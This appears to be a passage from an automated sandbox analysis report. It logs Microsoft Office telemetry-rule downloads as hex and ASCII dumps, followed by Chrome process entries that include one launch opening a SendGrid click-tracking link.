                                                                          2024-12-08 19:51:37 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:37 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:37 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 419
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                          ETag: "0x8DC582BB7F164C3"
                                                                          x-ms-request-id: 6578e9b9-801e-00a3-294a-497cfb000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195137Z-r1cf579d778w59f9hC1EWRze6w00000006f0000000008820
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          125192.168.2.44989013.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:37 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:38 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:38 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 477
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                          x-ms-request-id: 704c87bc-501e-00a0-2501-489d9f000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195138Z-r1cf579d778x776bhC1EWRdk800000000660000000008mpt
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:38 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          126192.168.2.44989113.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:37 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:38 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:38 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 419
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                          ETag: "0x8DC582B9FF95F80"
                                                                          x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195138Z-r1cf579d778bb9vvhC1EWRs95400000005ug000000008fxe
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          127192.168.2.44989313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:38 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:38 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:38 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 472
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                          ETag: "0x8DC582BB650C2EC"
                                                                          x-ms-request-id: 90ee9adf-001e-0014-3106-485151000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195138Z-r1cf579d778xr2r4hC1EWRqvfs000000068g0000000072ff
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          128192.168.2.44989213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:38 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:38 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:38 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 468
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                          ETag: "0x8DC582BB3EAF226"
                                                                          x-ms-request-id: 1f654f05-501e-008f-5009-489054000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195138Z-r1cf579d778dndrdhC1EWR4b2400000005z00000000038tq
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          129192.168.2.44989413.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:39 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:39 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:39 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 485
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                          ETag: "0x8DC582BB9769355"
                                                                          x-ms-request-id: 90a1454b-001e-0079-3203-4812e8000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195139Z-r1cf579d778x776bhC1EWRdk80000000069g000000004kg7
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:39 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          130192.168.2.44989513.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:39 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:14:50:07
                                                                          Start date:08/12/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:14:50:11
                                                                          Start date:08/12/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,17134630784947432504,9666418931932445698,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:14:50:18
                                                                          Start date:08/12/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3D"
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          No disassembly